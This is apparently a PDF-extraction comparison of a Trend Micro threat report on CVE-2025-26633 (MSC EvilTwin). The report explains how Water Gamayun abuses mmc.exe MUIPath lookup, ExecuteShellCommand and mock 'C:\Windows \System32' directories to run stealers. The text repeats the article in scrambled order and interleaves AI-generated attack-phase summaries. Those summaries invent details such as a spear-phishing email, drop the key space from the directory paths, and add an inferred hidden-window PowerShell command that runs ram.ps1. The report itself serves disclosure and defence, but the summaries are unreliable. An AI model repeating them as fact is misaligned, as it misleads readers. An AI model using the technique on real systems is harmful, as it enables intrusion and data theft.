CVE-2025-26633: How Water Gamayun Weaponizes MUIPath using MSC EvilTwin

ChatGPT paged: Each PDF page to text, then ChatGPT 4o (detailed)
Gemini 2.0: Full PDF with gemini-2.0-flash (8k output token limit)
Gemini 2.5: Full PDF with gemini-2.5-flash-preview-05-20 (65k output tokens limit)
Original: All text extracted from PDF

Original Text
CVE-2025-26633: How Water Gamayun Weaponizes MUIPath using MSC EvilTwin By: Aliakbar Zahravi March 25, 2025 Read time: 8 min (2173 words) Summary Trend Research uncovered a campaign by the Russian threat actor Water Gamayun that exploits a zero-day vulnerability in the Microsoft Management Console framework to execute malicious code, named MSC EvilTwin (CVE-2025-26633). In this attack the threat actor manipulates .msc files and the Multilingual User Interface Path (MUIPath) to download and execute malicious payload, maintain persistence and steal sensitive data from infected systems. Enterprises can be significantly impacted by such threats, as they can lead to data breaches and substantial financial loss. Various businesses, particularly those that use Microsoft's administrative tools heavily, may be at risk of falling victim to this campaign. Microsoft and Trend Zero Day Initiative’s™ (ZDI) bug bounty program worked together to disclose this vulnerability and quickly release a patch addressing it. Trend Vision One™ - Network Security has TippingPoint Intrusion Prevention Filters for Trend Micro customers to protect them against this threat. Trend Research uncovered a campaign by suspected Russian threat actor Water Gamayun, also known as EncryptHub and Larva-208, that abused a zero-day vulnerability in the Microsoft Management Console (mmc.exe) framework to execute malicious code on infected machines. We’ve named this technique MSC EvilTwin (CVE-2025-26633), which we track as ZDI-CAN-26371 (also known as ZDI-25-150). This is the first part of a two-part blog series about this campaign. This post focuses on the MSC EvilTwin technique and the Trojan loader that exploits this vulnerability, explaining how it works to download and execute malicious files on victim systems using Microsoft Console (.msc) files. The next post will dive into the different modules and payloads that this threat actor uses. This campaign is under active development; it employs multiple delivery methods and custom payloads designed to maintain persistence and steal sensitive data, then exfiltrate it to the attackers' command-and-control (C&C) servers. The following modules are the identified arsenal associated with the Water Gamayun, the details of which will be covered in the second blog post: EncryptHub stealer DarkWisp backdoor SilentPrism backdoor MSC EvilTwin loader Stealc Rhadamanthys stealer In cooperation with Microsoft, the bug bounty program of Trend Zero Day Initiative™ (ZDI) worked to disclose this zero-day attack and release a patch for this vulnerability on March 11. Trend also provides protection to enterprises from threat actors that exploit CVE-2025-26633 via the security solutions that can be found at end of this blog entry. Microsoft Management Console and the Microsoft Console File The Microsoft Management Console (MMC) is an application that provides a graphical user interface (GUI) and a programming framework used to create, save, and access collections of administrative tools – referred to as consoles – for managing various Windows hardware, software, and network components. These administrative tools, called snap-ins, are COM objects linked to Microsoft console files. The Windows Firewall (wf.msc) is an example of such a tool, shown in Figure 1. Figure 1. Windows Firewall file (wf.msc) A single .msc file can include references to multiple snap-ins (Figure 2). These files are scriptable, allowing users to create, modify, and use them to open MMC with a predefined set of tools and configurations. Figure 2. Microsoft Management Console - Snap-ins listed in the management console Techniques used by Water Gamayun In their attack, Water Gamayun abuse three techniques to execute malicious payload on an infected system via Windows MSC files: MSC EvilTwin (CVE-2025-26633) This technique involves executing malicious .msc files through a legitimate one. In this kind of attack, two .msc files with the same name are created on the system by the trojan loader: One file is clean and appears legitimate with no suspicious elements; the other is a malicious version that is dropped in the same location but within a directory named en-US. When the clean .msc file is run, mmc.exe loads the malicious file instead of the original file and executed. In this scenario, the adversary abuses the mmc.exe's Multilingual User Interface Path (MUIPath) feature. The default system language – English (United States) – has a MUIPath that is typically configured to include MUI files (.mui), which are designed to store language-specific resources for applications. These resources include localized text, dialogs, and user interface elements tailored for different languages. By abusing the way that mmc.exe uses MUIPath, the attacker can equip MUIPath en-US with a malicious .msc file, which cause the mmc.exe load this malicious file instead of the original file and executed without the victim’s knowledge. The following code snippet demonstrates how this technique is abused in mmc.exe (SHA256: If MUIPath en-US exists, mmc.exe loads the XML content from the .msc file in the en-US directory rather than from the original MSC file, and executes it. If the en-US directory does not exist, the selected .msc file content is loaded and executed. Execute shell command over the MSC file web rendering The second technique enables command shell execution through the ExecuteShellCommand method of the MMC from a View object on the victim's machine. This can be done by leveraging specially crafted .msc files and a Shockwave Flash Object within an ActiveX control, which opens a web browser by default (Figure 4). Figure 4. mmc.exe with ActiveX control snap-in open Given URL within StringTable by default with High priority The ExecuteShellCommand method is part of the MMC’s View Object, which runs a command in a window (Figure 5). 80055590cf6573c6ef381c9b834c35c1a5e7463aedbcf4b5427a903f1e588c50): 10.0.26100.2033 (WinBuild.160101.0800) file. Figure 3. mmc.exe MUI file handling When executing an .msc file through mmc.exe, the ScOnOpenDocument function calls the scGetMuiPath function, which uses the GetFileMUIPath Windows API to retrieve the MUI file if it exists. Mock trusted directories method The third approach involves creating mock directories that appear similar to standard system paths by adding trailing spaces or special characters in the name. For example, creating "C: \Windows \System32" (note the space before \System32) instead of the standard "C: \Windows\System32". When an application's path validation logic doesn't properly handle whitespace during string comparisons, it may interpret the modified directory as equivalent to the genuine system path. This can result in files being loaded from the alternate location rather than the intended system directory. This technique becomes relevant when working with applications that load libraries or executables with elevated access levels. MSC EvilTwin loader uses this method to drop WmiMgmt.msc (Figure 7). Figure 7. MSC EvilTwin loader uses the mock trusted directories method to drop WmiMgmt.msc MSC EvilTwin trojan loader The MSC EvilTwin loader is a trojan loader, written in PowerShell, weaponised all the techniques explained above to download and execute malicious payloads on compromised systems (Figure 8). Our analysis indicates that the attack begins with a digitally-signed MSI file masquerading as popular Chinese software like DingTalk or QQTalk (SHA256: 5588d1c5901d61bb09cd2fc86d523e2ccbc35a0565fd63c73b62757ac2ee51f5). These files are designed to fetch the MSC EvilTwin loader from the attacker's C&C server and execute it on the victim's machine. During our investigation, we discovered an early version of this technique being used in April 2024. Figure 5. The ExecuteShellCommand method is part of the MMC View Object In this context, View Object acts as an external object when an MMC snap-in hosts the Microsoft Internet Explorer browser component. This means that it is possible to access the MMC’s view object method remotely from an HTML page displayed in MMC by embedding a script tag, such as: In this case, the attacker hosts the following command to download and execute a next-stage payload on the victim's machine (Figure 6). This technique has been previously discussed by security practitioners and has a proof-of-concept. Figure 6. MMC's ExecuteShellCommnad method used by thread actor to download and execute payload Figure 8. MSC EvilTwin Loader main logic The loader contains two Base64-encoded blobs called $originalConsole and $hackedConsole. These are .msc files. The originalConsole variable stores a legitimate non-malicious .msc file, while hackedConsole contains maliciously crafted .msc files with the attacker’s C&C server address. Initially, the loader creates two directories: C:\Windows \System32 and C:\Windows \System32\en-US, which look similar to the legitimate WmiMgmt.msc paths on a Windows system (Figure 9). The loader then decodes and writes the contents of the .msc file. For the file WmiMgmt.msc in the en-US directory, it replaces the placeholder {htmlLoaderUrl} with the attacker's C&C server URL, hxxps://82[.]115.223.182/encrypthub/ram/. Figure 9. Legit and preexisting WmiMgmt.msc on Windows system (note the lack of whitespace in the system paths) The malware then executes the non-malicious WmiMgmt.msc located at C: \Windows\System32\WmiMgmt.msc. This triggers the EvilTwin technique, causing mmc.exe to load and execute WmiMgmt.msc from the MUI path en-US instead. This file contains the attacker’s C&C server URL in the StringTable section. This causes the mmc.exe, which has the ActiveX Control snap-in, to load Microsoft’s Internet Explorer browser components and load the URL’s HTML content within the mmc.exe to render and display. In this case, the attacker embedded the external.ExecuteShellCommand method within script tag in the malicious HTML page (Figure 10), which causes the MMC to execute the given command in the victim’s machine. In this example, the loader downloads and executes ram.ps1, the Rhadamanthys stealer downloader, on an infected system. Figure 10. The EvilTwin technique to execute a PowerShell Water Gamayun not only uses these techniques in this loader, but also extensively applies them in other modules to download and execute next-stage payloads or plugins from the server. By leveraging these techniques, attackers can proxy the execution of malicious payload through legitimate Windows binaries by running non-malicious files. Conclusion Trend Research’s investigation into this campaign demonstrates Water Gamayun’s approach to exploiting vulnerabilities within the MMC framework. By abusing a vulnerability in the MMC framework, which we have designated as MSC EvilTwin (CVE-2025-26633), this threat actor has effectively devised a method to execute malicious code on infected machines. In this installment of our two-part series, we focused on the technical aspects of the MSC EvilTwin technique and the Trojan loader used to exploit this vulnerability. This attack employs multiple innovative techniques to maintain persistence and exfiltrate sensitive data, leveraging the manipulation of .msc files and Microsoft's MUIPath. Our findings revealed that this campaign is actively developing, utilizing various delivery methods and custom payloads, as detailed in the modules deployed by Water Gamayun, including EncryptHub stealer, DarkWisp backdoor, SilentPrism backdoor, and Rhadamanthys stealer. Through the collaboration between Microsoft and the Trend ZDI, this zero-day attack has been disclosed and a patch has quickly been issued to address it. Enterprises need comprehensive cybersecurity solutions to combat the evolving threats exemplified by campaigns such as those conducted by Water Gamayun. With techniques that exploit vulnerabilities like MSC EvilTwin, a layered approach and advanced cybersecurity solutions are vital for safeguarding digital assets in a landscape where threat actors are continuously refining their tactics. Proactive security with Trend Vision One™ Organizations can protect themselves from attacks such as those employed by Water Gamayun

Original Text

CVE-2025-26633: How Water Gamayun Weaponizes MUIPath using MSC EvilTwin By: Aliakbar Zahravi March 25, 2025 Read time: 8 min (2173 words) Summary Trend Research uncovered a campaign by the Russian threat actor Water Gamayun that exploits a zero-day vulnerability in the Microsoft Management Console framework to execute malicious code, named MSC EvilTwin (CVE-2025-26633). In this attack the threat actor manipulates .msc files and the Multilingual User Interface Path (MUIPath) to download and execute malicious payload, maintain persistence and steal sensitive data from infected systems. Enterprises can be significantly impacted by such threats, as they can lead to data breaches and substantial financial loss. Various businesses, particularly those that use Microsoft's administrative tools heavily, may be at risk of falling victim to this campaign. Microsoft and Trend Zero Day Initiative’s™ (ZDI) bug bounty program worked together to disclose this vulnerability and quickly release a patch addressing it. Trend Vision One™ - Network Security has TippingPoint Intrusion Prevention Filters for Trend Micro customers to protect them against this threat. Trend Research uncovered a campaign by suspected Russian threat actor Water Gamayun, also known as EncryptHub and Larva-208, that abused a zero-day vulnerability in the Microsoft Management Console (mmc.exe) framework to execute malicious code on infected machines. We’ve named this technique MSC EvilTwin (CVE-2025-26633), which we track as ZDI-CAN-26371 (also known as ZDI-25-150). This is the first part of a two-part blog series about this campaign. This post focuses on the MSC EvilTwin technique and the Trojan loader that exploits this vulnerability, explaining how it works to download and execute malicious files on victim systems using Microsoft Console (.msc) files. The next post will dive into the different modules and payloads that this threat actor uses. This campaign is under active development; it employs multiple delivery methods and custom payloads designed to maintain persistence and steal sensitive data, then exfiltrate it to the attackers' command-and-control (C&C) servers. The following modules are the identified arsenal associated with the Water Gamayun, the details of which will be covered in the second blog post: EncryptHub stealer DarkWisp backdoor SilentPrism backdoor MSC EvilTwin loader Stealc Rhadamanthys stealer In cooperation with Microsoft, the bug bounty program of Trend Zero Day Initiative™ (ZDI) worked to disclose this zero-day attack and release a patch for this vulnerability on March 11. Trend also provides protection to enterprises from threat actors that exploit CVE-2025-26633 via the security solutions that can be found at end of this blog entry. Microsoft Management Console and the Microsoft Console File The Microsoft Management Console (MMC) is an application that provides a graphical user interface (GUI) and a programming framework used to create, save, and access collections of administrative tools – referred to as consoles – for managing various Windows hardware, software, and network components. These administrative tools, called snap-ins, are COM objects linked to Microsoft console files. The Windows Firewall (wf.msc) is an example of such a tool, shown in Figure 1. Figure 1. Windows Firewall file (wf.msc) A single .msc file can include references to multiple snap-ins (Figure 2). These files are scriptable, allowing users to create, modify, and use them to open MMC with a predefined set of tools and configurations. Figure 2. Microsoft Management Console - Snap-ins listed in the management console Techniques used by Water Gamayun In their attack, Water Gamayun abuse three techniques to execute malicious payload on an infected system via Windows MSC files: MSC EvilTwin (CVE-2025-26633) This technique involves executing malicious .msc files through a legitimate one. In this kind of attack, two .msc files with the same name are created on the system by the trojan loader: One file is clean and appears legitimate with no suspicious elements; the other is a malicious version that is dropped in the same location but within a directory named en-US. When the clean .msc file is run, mmc.exe loads the malicious file instead of the original file and executed.
In this scenario, the adversary abuses the mmc.exe's Multilingual User Interface Path (MUIPath) feature. The default system language – English (United States) – has a MUIPath that is typically configured to include MUI files (.mui), which are designed to store language-specific resources for applications. These resources include localized text, dialogs, and user interface elements tailored for different languages. By abusing the way that mmc.exe uses MUIPath, the attacker can equip MUIPath en-US with a malicious .msc file, which cause the mmc.exe load this malicious file instead of the original file and executed without the victim’s knowledge. The following code snippet demonstrates how this technique is abused in mmc.exe (SHA256: If MUIPath en-US exists, mmc.exe loads the XML content from the .msc file in the en-US directory rather than from the original MSC file, and executes it. If the en-US directory does not exist, the selected .msc file content is loaded and executed. Execute shell command over the MSC file web rendering The second technique enables command shell execution through the ExecuteShellCommand method of the MMC from a View object on the victim's machine. This can be done by leveraging specially crafted .msc files and a Shockwave Flash Object within an ActiveX control, which opens a web browser by default (Figure 4). Figure 4. mmc.exe with ActiveX control snap-in open Given URL within StringTable by default with High priority The ExecuteShellCommand method is part of the MMC’s View Object, which runs a command in a window (Figure 5). 80055590cf6573c6ef381c9b834c35c1a5e7463aedbcf4b5427a903f1e588c50): 10.0.26100.2033 (WinBuild.160101.0800) file. Figure 3. mmc.exe MUI file handling When executing an .msc file through mmc.exe, the ScOnOpenDocument function calls the scGetMuiPath function, which uses the GetFileMUIPath Windows API to retrieve the MUI file if it exists. Mock trusted directories method The third approach involves creating mock directories that appear similar to standard system paths by adding trailing spaces or special characters in the name. For example, creating "C: \Windows \System32" (note the space before \System32) instead of the standard "C: \Windows\System32". When an application's path validation logic doesn't properly handle whitespace during string comparisons, it may interpret the modified directory as equivalent to the genuine system path. This can result in files being loaded from the alternate location rather than the intended system directory. This technique becomes relevant when working with applications that load libraries or executables with elevated access levels. MSC EvilTwin loader uses this method to drop WmiMgmt.msc (Figure 7). Figure 7. MSC EvilTwin loader uses the mock trusted directories method to drop WmiMgmt.msc MSC EvilTwin trojan loader The MSC EvilTwin loader is a trojan loader, written in PowerShell, weaponised all the techniques explained above to download and execute malicious payloads on compromised systems (Figure 8). Our analysis indicates that the attack begins with a digitally-signed MSI file masquerading as popular Chinese software like DingTalk or QQTalk (SHA256: 5588d1c5901d61bb09cd2fc86d523e2ccbc35a0565fd63c73b62757ac2ee51f5). These files are designed to fetch the MSC EvilTwin loader from the attacker's C&C server and execute it on the victim's machine. During our investigation, we discovered an early version of this technique being used in April 2024. Figure 5. The ExecuteShellCommand method is part of the MMC View Object In this context, View Object acts as an external object when an MMC snap-in hosts the Microsoft Internet Explorer browser component. This means that it is possible to access the MMC’s view object method remotely from an HTML page displayed in MMC by embedding a script tag, such as:

In this case, the attacker hosts the following command to download and execute a next-stage payload on the victim's machine (Figure 6). This technique has been previously discussed by security practitioners and has a proof-of-concept. Figure 6. MMC's ExecuteShellCommnad method used by thread actor to download and execute payload Figure 8. MSC EvilTwin Loader main logic The loader contains two Base64-encoded blobs called $originalConsole and $hackedConsole. These are .msc files. The originalConsole variable stores a legitimate non-malicious .msc file, while hackedConsole contains maliciously crafted .msc files with the attacker’s C&C server address. Initially, the loader creates two directories: C:\Windows \System32 and C:\Windows \System32\en-US, which look similar to the legitimate WmiMgmt.msc paths on a Windows system (Figure 9). The loader then decodes and writes the contents of the .msc file. For the file WmiMgmt.msc in the en-US directory, it replaces the placeholder {htmlLoaderUrl} with the attacker's C&C server URL, hxxps://82[.]115.223.182/encrypthub/ram/. Figure 9. Legit and preexisting WmiMgmt.msc on Windows system (note the lack of whitespace in the system paths) The malware then executes the non-malicious WmiMgmt.msc located at C: \Windows\System32\WmiMgmt.msc. This triggers the EvilTwin technique, causing mmc.exe to load and execute WmiMgmt.msc from the MUI path en-US instead. This file contains the attacker’s C&C server URL in the StringTable section.
This causes the mmc.exe, which has the ActiveX Control snap-in, to load Microsoft’s Internet Explorer browser components and load the URL’s HTML content within the mmc.exe to render and display. In this case, the attacker embedded the external.ExecuteShellCommand method within script tag in the malicious HTML page (Figure 10), which causes the MMC to execute the given command in the victim’s machine. In this example, the loader downloads and executes ram.ps1, the Rhadamanthys stealer downloader, on an infected system. Figure 10. The EvilTwin technique to execute a PowerShell Water Gamayun not only uses these techniques in this loader, but also extensively applies them in other modules to download and execute next-stage payloads or plugins from the server. By leveraging these techniques, attackers can proxy the execution of malicious payload through legitimate Windows binaries by running non-malicious files. Conclusion Trend Research’s investigation into this campaign demonstrates Water Gamayun’s approach to exploiting vulnerabilities within the MMC framework. By abusing a vulnerability in the MMC framework, which we have designated as MSC EvilTwin (CVE-2025-26633), this threat actor has effectively devised a method to execute malicious code on infected machines. In this installment of our two-part series, we focused on the technical aspects of the MSC EvilTwin technique and the Trojan loader used to exploit this vulnerability. This attack employs multiple innovative techniques to maintain persistence and exfiltrate sensitive data, leveraging the manipulation of .msc files and Microsoft's MUIPath. Our findings revealed that this campaign is actively developing, utilizing various delivery methods and custom payloads, as detailed in the modules deployed by Water Gamayun, including EncryptHub stealer, DarkWisp backdoor, SilentPrism backdoor, and Rhadamanthys stealer. Through the collaboration between Microsoft and the Trend ZDI, this zero-day attack has been disclosed and a patch has quickly been issued to address it. Enterprises need comprehensive cybersecurity solutions to combat the evolving threats exemplified by campaigns such as those conducted by Water Gamayun. With techniques that exploit vulnerabilities like MSC EvilTwin, a layered approach and advanced cybersecurity solutions are vital for safeguarding digital assets in a landscape where threat actors are continuously refining their tactics. Proactive security with Trend Vision One™ Organizations can protect themselves from attacks such as those employed by Water Gamayun

Original Text	ChatGPT 4o Paged
CVE-2025-26633: How Water Gamayun Weaponizes MUIPath using MSC EvilTwin By: Aliakbar Zahravi March 25, 2025 Read time: 8 min (2173 words) Summary Trend Research uncovered a campaign by the Russian threat actor Water Gamayun that exploits a zero-day vulnerability in the Microsoft Management Console framework to execute malicious code, named MSC EvilTwin (CVE-2025-26633). In this attack the threat actor manipulates .msc files and the Multilingual User Interface Path (MUIPath) to download and execute malicious payload, maintain persistence and steal sensitive data from infected systems. Enterprises can be significantly impacted by such threats, as they can lead to data breaches and substantial financial loss. Various businesses, particularly those that use Microsoft's administrative tools heavily, may be at risk of falling victim to this campaign. Microsoft and Trend Zero Day Initiative’s™ (ZDI) bug bounty program worked together to disclose this vulnerability and quickly release a patch addressing it. Trend Vision One™ - Network Security has TippingPoint Intrusion Prevention Filters for Trend Micro customers to protect them against this threat. Trend Research uncovered a campaign by suspected Russian threat actor Water Gamayun, also known as EncryptHub and Larva-208, that abused a zero-day vulnerability in the Microsoft Management Console (mmc.exe) framework to execute malicious code on infected machines. We’ve named this technique MSC EvilTwin (CVE-2025-26633), which we track as ZDI-CAN-26371 (also known as ZDI-25-150). This is the first part of a two-part blog series about this campaign. This post focuses on the MSC EvilTwin technique and the Trojan loader that exploits this vulnerability, explaining how it works to download and execute malicious files on victim systems using Microsoft Console (.msc) files. The next post will dive into the different modules and payloads that this threat actor uses. This campaign is under active development; it employs multiple delivery methods and custom payloads designed to maintain persistence and steal sensitive data, then exfiltrate it to the attackers' command-and-control (C&C) servers. The following modules are the identified arsenal associated with the Water Gamayun, the details of which will be covered in the second blog post: EncryptHub stealer	Phase: Initial Access Technique: Exploitation of CVE-2025-26633 (MSC EvilTwin) Procedure: The attacker exploits a zero-day vulnerability in Microsoft Management Console (mmc.exe) by manipulating .msc files to execute malicious code. Phase: Execution Technique: Malicious Code Execution via MUIPath Procedure: The attacker uses the Multilingual User Interface Path (MUIPath) within manipulated .msc files to download and execute malicious payloads on the victim's system. Phase: Persistence Technique: Malicious Payload Persistence Procedure: Custom payloads are employed to maintain persistence on the system using the compromised .msc files. Phase: Data Collection Technique: Data Theft using Custom Modules Procedure: The campaign utilizes custom modules designed to steal sensitive data from infected systems. Phase: Exfiltration Technique: Exfiltration to C&C Servers Procedure: Stolen data is exfiltrated to the attackers' command-and-control (C&C) servers.
DarkWisp backdoor SilentPrism backdoor MSC EvilTwin loader Stealc Rhadamanthys stealer In cooperation with Microsoft, the bug bounty program of Trend Zero Day Initiative™ (ZDI) worked to disclose this zero-day attack and release a patch for this vulnerability on March 11. Trend also provides protection to enterprises from threat actors that exploit CVE-2025-26633 via the security solutions that can be found at end of this blog entry. Microsoft Management Console and the Microsoft Console File The Microsoft Management Console (MMC) is an application that provides a graphical user interface (GUI) and a programming framework used to create, save, and access collections of administrative tools – referred to as consoles – for managing various Windows hardware, software, and network components. These administrative tools, called snap-ins, are COM objects linked to Microsoft console files. The Windows Firewall (wf.msc) is an example of such a tool, shown in Figure 1. Figure 1. Windows Firewall file (wf.msc) A single .msc file can include references to multiple snap-ins (Figure 2). These files are scriptable, allowing users to create, modify, and use them to open MMC with a predefined set of tools and configurations.	Phase: Initial Access Technique: Spear Phishing via Email Attachment Procedure: Threat actor sends a spear-phishing email with a malicious attachment containing a backdoor (likely using DarkWisp or SilentPrism). Phase: Execution Technique: Exploitation of CVE-2025-26633 Procedure: The attacker exploits a zero-day vulnerability in the Microsoft Management Console (MMC) through malicious .msc files to execute arbitrary code. Phase: Payload Deployment Technique: Backdoor Installation Tools: DarkWisp, SilentPrism Procedure: Deploys backdoors for establishing a persistent access channel. Technique: Loader Execution Tools: MSC EvilTwin Procedure: Executes the MSC EvilTwin loader to deploy additional payloads such as Stealc and Rhadamanthys stealer. Phase: Credential Access Technique: Information Stealing Tools: Stealc and Rhadamanthys stealer Procedure: Deploys stealing tools to capture credentials and exfiltrate sensitive data. Phase: Persistence Technique: MMC Snap-in Manipulation Procedure: Uses scriptable .msc files to maintain persistence by configuring MMC with malicious snap-ins. Phase: Impact Technique: Data Exfiltration Procedure: Uses stolen credentials and sensitive information to perform data exfiltration, leveraging installed backdoors and loaders. The threat actor leverages customized attack vectors exploiting vulnerabilities in MMC to deploy and control their payloads, maintaining access and exfiltrating data across compromised environments.
Figure 2. Microsoft Management Console - Snap-ins listed in the management console Techniques used by Water Gamayun In their attack, Water Gamayun abuse three techniques to execute malicious payload on an infected system via Windows MSC files: MSC EvilTwin (CVE-2025-26633) This technique involves executing malicious .msc files through a legitimate one. In this kind of attack, two .msc files with the same name are created on the system by the trojan loader: One file is clean and appears legitimate with no suspicious elements; the other is a malicious version that is dropped in the same location but within a directory named en-US. When the clean .msc file is run, mmc.exe loads the malicious file instead of the original file and executed. In this scenario, the adversary abuses the mmc.exe's Multilingual User Interface Path (MUIPath) feature. The default system language – English (United States) – has a MUIPath that is typically configured to include MUI files (.mui), which are designed to store language-specific resources for applications. These resources include localized text, dialogs, and user interface elements tailored for different languages. By abusing the way that mmc.exe uses MUIPath, the attacker can equip MUIPath en-US with a malicious .msc file, which cause the mmc.exe load this malicious file instead of the original file and executed without the victim’s knowledge. The following code snippet demonstrates how this technique is abused in mmc.exe (SHA256:	Phase: Execution Technique: MSC File Execution via MUIPath Abuse Procedure: The attacker creates two .msc files with the same name in different locations. One is legitimate, and the other is malicious, placed in an `en-US` directory. When the clean .msc file is executed, `mmc.exe` loads the malicious file due to the MUIPath configuration, executing the payload without user awareness. This technique leverages the Multilingual User Interface Path (MUIPath), which mmc.exe uses to determine file precedence, allowing the malicious file to be executed over the legitimate one.
If MUIPath en-US exists, mmc.exe loads the XML content from the .msc file in the en-US directory rather than from the original MSC file, and executes it. If the en-US directory does not exist, the selected .msc file content is loaded and executed. Execute shell command over the MSC file web rendering The second technique enables command shell execution through the ExecuteShellCommand method of the MMC from a View object on the victim's machine. This can be done by leveraging specially crafted .msc files and a Shockwave Flash Object within an ActiveX control, which opens a web browser by default (Figure 4). Figure 4. mmc.exe with ActiveX control snap-in open Given URL within StringTable by default with High priority The ExecuteShellCommand method is part of the MMC’s View Object, which runs a command in a window (Figure 5).	Phase: Execution Technique: Malicious File Execution using MMC Procedure: The threat actor uses `mmc.exe` to load and execute XML content from a .msc file located in the en-US directory. If the directory doesn't exist, the original .msc file content is used. Phase: Execution Technique: Command Execution via MMC Procedure: Command shell execution is enabled using the `ExecuteShellCommand` method of the MMC from a View object. This is achieved by using specially crafted .msc files that include a Shockwave Flash Object within an ActiveX control, which opens a web browser by default. The procedures suggest leveraging MMC's capabilities to execute arbitrary commands hidden within .msc files, exploiting ActiveX controls for further execution.
80055590cf6573c6ef381c9b834c35c1a5e7463aedbcf4b5427a903f1e588c50): 10.0.26100.2033 (WinBuild.160101.0800) file. Figure 3. mmc.exe MUI file handling When executing an .msc file through mmc.exe, the ScOnOpenDocument function calls the scGetMuiPath function, which uses the GetFileMUIPath Windows API to retrieve the MUI file if it exists.	Phase: Execution Technique: Abuse of System Utilities (MMC) Procedure: Utilize `mmc.exe` to execute an `.msc` file. Details: The `ScOnOpenDocument` function is called, triggering `scGetMuiPath`, which uses the `GetFileMUIPath` API to locate and retrieve the associated MUI file if present. This method leverages the built-in Microsoft Management Console (MMC) to execute tasks through the manipulation of its handling functions and paths.
Mock trusted directories method The third approach involves creating mock directories that appear similar to standard system paths by adding trailing spaces or special characters in the name. For example, creating "C: \Windows \System32" (note the space before \System32) instead of the standard "C: \Windows\System32". When an application's path validation logic doesn't properly handle whitespace during string comparisons, it may interpret the modified directory as equivalent to the genuine system path. This can result in files being loaded from the alternate location rather than the intended system directory. This technique becomes relevant when working with applications that load libraries or executables with elevated access levels. MSC EvilTwin loader uses this method to drop WmiMgmt.msc (Figure 7). Figure 7. MSC EvilTwin loader uses the mock trusted directories method to drop WmiMgmt.msc MSC EvilTwin trojan loader The MSC EvilTwin loader is a trojan loader, written in PowerShell, weaponised all the techniques explained above to download and execute malicious payloads on compromised systems (Figure 8). Our analysis indicates that the attack begins with a digitally-signed MSI file masquerading as popular Chinese software like DingTalk or QQTalk (SHA256: 5588d1c5901d61bb09cd2fc86d523e2ccbc35a0565fd63c73b62757ac2ee51f5). These files are designed to fetch the MSC EvilTwin loader from the attacker's C&C server and execute it on the victim's machine. During our investigation, we discovered an early version of this technique being used in April 2024.	Phase: Initial Access Technique: Masquerading as Legitimate Application Procedure: The attacker distributes a digitally-signed MSI file masquerading as popular Chinese software such as DingTalk or QQTalk. This MSI file is used to download and execute the MSC EvilTwin loader. Phase: Execution Technique: PowerShell Execution Procedure: The MSC EvilTwin loader, written in PowerShell, executes to download and run malicious payloads on compromised systems. Phase: Defense Evasion Technique: Mock Trusted Directories Procedure: Action: Create mock directories similar to standard system paths with trailing spaces or special characters, such as "C:\Windows \System32". Target: Applications with path validation logic that fails to handle whitespace, leading to loading files from alternate locations. Phase: Payload Delivery Technique: Remote Payload Fetching Procedure: The MSI file fetches the MSC EvilTwin loader from the attacker's C&C server for execution on the victim's machine.
Figure 5. The ExecuteShellCommand method is part of the MMC View Object In this context, View Object acts as an external object when an MMC snap-in hosts the Microsoft Internet Explorer browser component. This means that it is possible to access the MMC’s view object method remotely from an HTML page displayed in MMC by embedding a script tag, such as: In this case, the attacker hosts the following command to download and execute a next-stage payload on the victim's machine (Figure 6). This technique has been previously discussed by security practitioners and has a proof-of-concept. Figure 6. MMC's ExecuteShellCommnad method used by thread actor to download and execute payload	Phase: Execution Technique: Exploitation of MMC ExecuteShellCommand for Code Execution Procedure: The attacker hosts an HTML page that leverages the `ExecuteShellCommand` method within an MMC View Object by embedding a script tag. The command embedded in the script allows for downloading and executing a next-stage payload. Script Example: `<script>external.ExecuteShellCommand(...)</script>` Note: The exact command line used for downloading and executing the payload is not specified, but it would likely involve executing a command such as `powershell` or `cmd` to fetch and run the payload.
Figure 8. MSC EvilTwin Loader main logic The loader contains two Base64-encoded blobs called $originalConsole and $hackedConsole. These are .msc files. The originalConsole variable stores a legitimate non-malicious .msc file, while hackedConsole contains maliciously crafted .msc files with the attacker’s C&C server address. Initially, the loader creates two directories: C:\Windows \System32 and C:\Windows \System32\en-US, which look similar to the legitimate WmiMgmt.msc paths on a Windows system (Figure 9). The loader then decodes and writes the contents of the .msc file. For the file WmiMgmt.msc in the en-US directory, it replaces the placeholder {htmlLoaderUrl} with the attacker's C&C server URL, hxxps://82[.]115.223.182/encrypthub/ram/. Figure 9. Legit and preexisting WmiMgmt.msc on Windows system (note the lack of whitespace in the system paths) The malware then executes the non-malicious WmiMgmt.msc located at C: \Windows\System32\WmiMgmt.msc. This triggers the EvilTwin technique, causing mmc.exe to load and execute WmiMgmt.msc from the MUI path en-US instead. This file contains the attacker’s C&C server URL in the StringTable section. This causes the mmc.exe, which has the ActiveX Control snap-in, to load Microsoft’s Internet Explorer browser components and load the URL’s HTML content within the mmc.exe to render and display. In this case, the attacker embedded the external.ExecuteShellCommand method within script tag in the malicious HTML page (Figure 10), which causes the MMC to execute the given command in the victim’s machine. In this example, the loader downloads and executes ram.ps1, the Rhadamanthys stealer downloader, on an infected system.	Phase: Initial Access Technique: Malicious File Delivery Procedure: The attacker delivers a loader containing two Base64-encoded .msc files. Phase: Execution Technique: Batch Script Execution via MMC Executed Program: `mmc.exe` Procedure: The malware writes a legitimate and a malicious .msc file into directories that mimic legitimate Windows paths, then executes the non-malicious WmiMgmt.msc, which triggers execution of the malicious WmiMgmt.msc from an alternate path. Phase: Persistence Technique: File Write for Execution Procedure: The loader creates directories `C:\Windows\System32` and `C:\Windows\System32\en-US`, writes the decoded .msc files, and modifies WmiMgmt.msc by embedding a C&C server URL. Phase: Execution via Browser Control Technique: Malicious HTML Execution in MMC Procedure: The mmc.exe loads HTML content containing an embedded `external.ExecuteShellCommand` method via Internet Explorer components, leading to the execution of commands on the system. Phase: Impact Technique: Download and Execute PowerShell Script Command (Inferred): `powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File ram.ps1` Procedure: The MMC mechanism downloads and executes the Rhadamanthys stealer downloader via a PowerShell script.
